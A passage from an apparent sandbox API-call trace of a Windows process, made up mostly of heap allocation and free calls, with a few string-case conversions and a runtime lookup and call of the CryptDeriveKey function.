hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0267.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.068] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.069] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.069] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.070] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.070] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.070] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x34aa6e8 [0267.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa6e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.076] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.076] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, 